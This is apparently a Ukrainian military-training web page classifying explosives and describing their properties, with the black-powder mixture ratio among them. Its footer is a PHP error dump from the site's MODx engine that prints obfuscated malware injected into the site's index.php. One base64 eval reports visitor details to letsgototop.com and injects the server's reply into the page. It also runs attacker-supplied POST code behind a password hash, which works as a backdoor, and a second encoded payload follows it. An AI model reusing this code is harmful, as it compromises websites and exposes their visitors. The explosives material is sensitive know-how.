Класифікація вибухових речовин

Український легіон » Дисципліни » Авіаційні засоби ураження » Класифікація вибухових речовин

Класифікація вибухових речовин

 Речовини, здатні до вибухових перетворень, називаються вибуховими речовинами. В даний час відоме велика кількість ВР, які  відрізняються друг від друга як за складом, так і за фізико-хімічними і вибуховими властивостями.

Класифікація ВР за складом.

 У залежності  від  складу  усі ВР можуть бути підрозділені на дві основні групи:

 • однорідні хімічні сполуки;
 •  неоднорідні ВР (сплави, суміші і пластичні ВР)  

         Однорідні хімічні вибухові сполуки - являють собою відносно  хитливі  хімічні системи, здатні  під впливом зовнішніх факторів до швидких екзотермічних перетворень.

 Більшість ВР цих  груп  є кисневмісними органічними сполуками (тротил,  пікринова кислота, тетрил, гексоген, тен, піроксилін, нітрогліцерин).

Неоднорідні:

Сплавами називаються складні ВР, утворені з декількох розплавлених і взаємно розчинених однорідних ВР.

Сплави дають можливість використання для спорядження боєприпасів  найбільш потужних ВР (гексоген, октоген, тен і ін.), застосування яких у чистому виді обмежено, в основному, через їхню високу чутливість до удару і неможливість проводити спорядження простим способом.

          Вибухові суміші -  являють  собою  системи, що  складаються з двох чи більшого числа хімічно незв'язаних між собою вибухових компонентів.

      Вибухові суміші можуть знаходитися в газоподібному, рідкому і твердому станах (амоніти,  динаміти, суміші тротилу з гексогеном і ін.).

Пластичні ВР  легко деформуються під дією незначних зовнішніх сил і зберігають залишкові деформації після їхньої дії (пластид-4).

Класифікація ВР за застосуванням

       У залежності від застосування ВР розділяються на чотири  групи:

 • ініціюючі ВР;
 • бризантні ВР;
 • метальні ВР і  порохи;
 • піротехнічні суміші.

Ініціюючі ВР  застосовуються для спорядження засобів ініціювання - пристроїв,  призначених для збудження вибухового розкладання інших ВР.

Характерною рисою ініціюючих ВР є те,  що для збудження вибуху у формі детонації  необхідно незначний зовнішній вплив, а сам процес вибуху відрізняється дуже малим періодом наростання швидкості  до  максимального  її значення - незрівнянно меншим,  чим в інших типів ВР.

Завдяки останній властивості для збудження вибуху  бризантних  ВР  звичайно потрібно лише дуже невеликий заряд ініціатора. Найважливішими представниками ініціюючих ВР є:

 • гримуча ртуть;
 • азид свинцю;
 • тринітрорезорцінад свинцю (ТНРС);
 • тетразен.

Бризантні ВР застосовуються як  розривні  заряди  в засобах ураження і в підривних системах. На відміну від ініціюючих ВР вони мають меншу чутливість до зовнішніх впливів  і великий період  наростання  швидкості  вибухового перетворення до максимального значення.

Основним  видом  вибухового  перетворення бризантних ВР є детонація,  яка викликається звичайно вибухом ініціюючих ВР.

Основними представниками бризантних ВР є:

 • тротил;
 • тетрил;
 • гексоген;
 • октоген;
 • піроксилін;
 • тен (тетранітропентаетрит);
 • нітрогліцерин;
 • ТГ (тротил-гексоген), ТГА (тротил-гексоген-алюміній).

Різні види пороху застосовуються головним чином для метання снарядів у вогнепальній зброї і створення реактивної сили в ракетах.

Основним видом вибухового перетворення різних видів пороху є горіння, яке не переходить в детонацію навіть при високих тисках ,  (однак при  особливих умовах -  простріл чи пробиття заряду кулею чи осколком пороху здатні детонувати).

 За фізичною структурою види пороху  розділяють на дві групи :

 • суміші ;
 • нітроцелюлозні чи бездимні.

Сумішний порох являє собою механічні суміші окислювачів, пальних і зв'язувальних речовин.  Типовим представником сумішного пороху є димний порох (калієва селітра -  75%,  вугілля деревне -  15%,  сірка  -  10%).

 В останні роки набули широкого застосування ракетні сумішні порохи.  У таких порохих окислювачами є нітрати і перхлорати, а пальне (зв'язувальні речовини) –  високомолекулярні з'єднання: каучуки, пластмаси, смоли і т.п.

         Нітроцелюлоїдні порохи  являють собою гомогенні системи, що включають у себе нітрати целюлози, розчинники, стабілізатори і флегматизатори.

 Нітрати целюлози зі змістом азоту понад 12%  утворять  піроксилінові порохи,  а менш 12%  - колоксилінові порохи.

Для розчинення нітратів целюлози  використовують  спиртоефірні суміші, ацетон, нітрогліцерин і рідкий тротил.

Піротехнічні суміші  застосовуються як спорядження запальних і допоміжних АЗП (освітлювальних, сигнальних, димових і т.п.)

 Піротехнічні суміші являють собою механічну суміш пальних речовин з окислювачами і речовинами, цементуючими суміш (цементаторами).

 Застосовуються такі пальні речовини: алюміній, магній, кремній, крохмаль, вугілля і т.д.

Застосовуються такі окислювачі, які багаті киснем і легко віддають його при нагріванні. До них відносяться солі азотної й іншої кислот, а також деякі окисли металів.

         У якості цементаторів використовуються речовини, що володіють гарними сполучними властивостями і скріплюють окремі частки складу в міцну масу: бакеліт, оліфа, касторове олія й ін.

За характером дії піротехнічні суміші підрозділяються на:

 • запальні;
 • освітлювальні;
 • сигнальні;
 • трасуючі;
 • димові;
 • імітаційні.

ВР відрізняються друг від друга своїми характеристиками, з цими характеристиками ми познайомимося в 2 навчальному питанні.

 

Основні характеристики вибухових речовин

 Основними характеристиками ВР, які  визначають їхні вибухові властивості є наступні:

 • чутливість;
 • стійкість;
 • теплота вибуху;
 • температура вибуху (горіння);
 • обсяг і склад газоподібних продуктів вибуху;
 • фугасність;
 • бризантність;
 • швидкість детонації.

 Більш докладно розглянемо ці характеристики.

Чутливість- здатність ВР до вибухових перетворень під впливом початкового  імпульсу.

Початкові імпульси можуть бути:

 • механічними,
 • тепловими,
 • електричними,
 • хімічними,
 • детонаційними.

 Кількісною мірою  чутливості  є  мінімальна величина початкового імпульсу.

Чутливість ВР залежить від:

 • температури ВР;
 • агрегатного стану;
 • щільності;
 • наявності домішок.

Найбільше впливають на чутливість  ВР щільність ВР і наявність домішок.

 Зі збільшенням щільності чутливість ВР  знижується.

 Домішки, що знижують чутливість ВР,  називаються флегматизаторами.

До флегматизаторів відносяться: віск,  парафін, вазелін і ін. Ці речовини вкривають поверхню кристалів ВР тонкою еластичною плівкою та знижують концентрацію енергії у кристалічній структурі ВР.

         Домішки, що підвищують чутливість ВР,  називають сенсибілізаторами.

Як сенсибілізатори застосовують: дрібне скло, пісок, металевий порошок  і  інші  речовини, що  володіють  високою твердістю, температурою плавлення, а також  сприяють концентрації енергії в кристалічній структурі ВР.

Стійкість ВР - здатність  зберігати свої властивості в умовах тривалого збереження.

   Розрізняють 2 види стійкості:

 • фізичну - схильність ВР до фізичних змін (летючість, механічну міцність і ін);
 • хімічну - здатність підтримувати стабільність хімічної структури.
 • По хімічній стійкості усі ВР розділяються на стійкі і не стійкі.

Стійкі - бризантні ВР.

Не стійкі - порохи і піротехнічні суміші.

Хімічна стійкість одного і того ж ВР залежить від наявності сторонніх домішок. Домішки, які збільшують швидкість розкладання називаються каталізатори (оксиди азоту). Домішки,  що сповільнюють розкладання називаються стабілізаторами (дифеніламін, централіт, ацетон і ін.)

Теплота вибуху - кількість теплоти, що виділяється під час вибуху 1кг ВР при постійному об’ємі.

Чим більше теплота вибуху, тим більша  руйнівна сила ВР.

Температура вибуху - визначається  максимальною температурою, до якої  нагріваються  продукти вибуху в момент вибухового перетворення ВР.

Температура  вибуху,  як  і  теплота вибуху, є  характеристикою руйнівної дії вибуху. Для сучасних ВР температура вибуху складає Тв=2380-4350 0С   ( гримуча ртуть - 4350, тротил - 3330, димний порох – 2650 0С).

Об’єм  і склад газоподібних продуктів вибуху (ГПВ)

ГПВ відіграють роль робочого тіла. При горінні ВР на відкритому повітрі відбувається розпад молекул ВР, при цьому продукти розкладання складаються з: вуглекислого газу , чадного газу - СО, води - , азоту - , водню -, окису азоту -  і ін.

В умовах детонації кількісний і якісний склад ГПВ відрізняється, до нього додаються: аміак - NH, синильна кислота - HCN, ціан - CN, метан - CH.

На склад і обсяг ГПВ впливають: щільність заряду, спосіб збудження, початкові умови розльоту продуктів вибуху й ін.

Бризантність- здатність ВР до місцевої руйнівної дії, що є результатом різкого удару продуктів вибуху по навколишньому середовищу.

Бризантна дія виявляється лише на  близьких  відстанях від місця вибуху, де тиск і щільність енергії продуктів вибуху ще досить великі.

За рахунок бризантної дії відбувається здрібнювання, пробивання чи дроблення середовища, що стикається з зарядом ВР. Досліди показують, що бризантна дія залежить, головним чином, від щільності заряду і швидкості детонації ВР. Бризантність визначається експериментально (наприклад- проба на обтиснення двох циліндрів h1- висота ВР до вибуху, h2- висота ВР після вибуху, міра бризантності h=h1 - h2).

Фугасність - здатність ВР до  руйнівної дії за рахунок  розширення  продуктів вибуху до порівняно не високих  тисків і проходження ударної хвилі по середовищу.

Фугасна дія виявляється у формі розколювання і  відкидання навколишнього середовища,  у якій відбувається вибух.  Дуже часто фугасність називають працездатністю ВР. Досвід показує, що працездатність ВР залежить від теплоти вибуху, питомого обсягу і складу продуктів вибуху. Для практичної оцінки працездатності ВР звичайно використовують так називану  пробу  на  розширення  свинцевої бомби. Заряд  випробуваного  ВР визначеної ваги вибухає в циліндричному каналі свинцевої бомби.  При вибуху канал розширюється і здобуває грушоподібну форму.  Різниця між обсягом каналу до і після вибуху є практичною мірою  працездатності  ВР.  Ця величина  характеризує відносну працездатність  ВР  і застосовується тільки для порівняльної оцінки ВР.

ВР є основою будь-якого АЗП, від їхнього знання залежить правильне і безпечне поводження з різними боєприпасами.

Останні статті

Отримання дозволу на зброю
03.04.2015

Отримання дозволу на зброю

Перелік документів на придбання нарізної та гладкоствольної зброї
Детальніше
Гарнізонні заходи за участю військ.
28.05.2014

Гарнізонні заходи за участю військ.

Детальніше
MODx Content Manager »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert(): Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /sata2/home/users/ukrlegion/www/www.ukrlegion.com/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0,0131 s(22 Requests)
  PHP: 0,2739 s 
  Total: 0,2870 s